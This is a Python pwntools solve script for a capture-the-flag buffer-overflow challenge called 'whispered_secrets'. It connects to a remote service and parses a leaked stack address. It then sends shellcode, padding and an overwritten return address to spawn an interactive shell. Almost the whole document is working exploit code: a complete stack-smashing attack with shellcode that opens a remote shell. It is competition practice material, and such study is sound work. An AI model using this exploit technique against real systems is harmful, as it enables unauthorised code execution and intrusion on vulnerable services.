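#!/usr/bin/env python3
"""Solve script for the "whispered_secrets" BOF challenge.

The service prints a line containing "secret: <hex>" that leaks the
address of its stack buffer. The script puts the shellcode at the start
of that buffer, pads up to OFFSET_TO_RIP and overwrites the saved return
address with the leaked buffer address. The binary has NX disabled (see
the comment below), so returning into the buffer is what makes this work.
"""
from pwn import *

context.binary = elf = ELF("whispered_secrets", checksec=False)
context.arch = "amd64"
context.os = "linux"

# Distance from the start of the buffer to the saved return address.
OFFSET_TO_RIP = 136

p = remote("offsec.m0lecon.it", 13528)

# Parse the leaked buffer address out of the "secret: <hex>" line.
leak_line = p.recvline_contains(b"secret:")
buf_addr = int(leak_line.split(b"secret: ")[1].strip(), 16)
log.info(f"buf = {buf_addr:#x}")

# NX disabled
shellcode = asm(shellcraft.sh())

# Fail loudly if the shellcode does not fit before the return address:
# a negative repeat count would silently yield empty padding and shift
# the p64() off the intended offset instead of raising.
padding_len = OFFSET_TO_RIP - len(shellcode)
if padding_len < 0:
    raise ValueError(
        f"shellcode is {len(shellcode)} bytes, larger than OFFSET_TO_RIP={OFFSET_TO_RIP}"
    )

payload = flat(shellcode, b"A" * padding_len, p64(buf_addr))
p.sendafter(b"secret:\n", payload)
p.interactive()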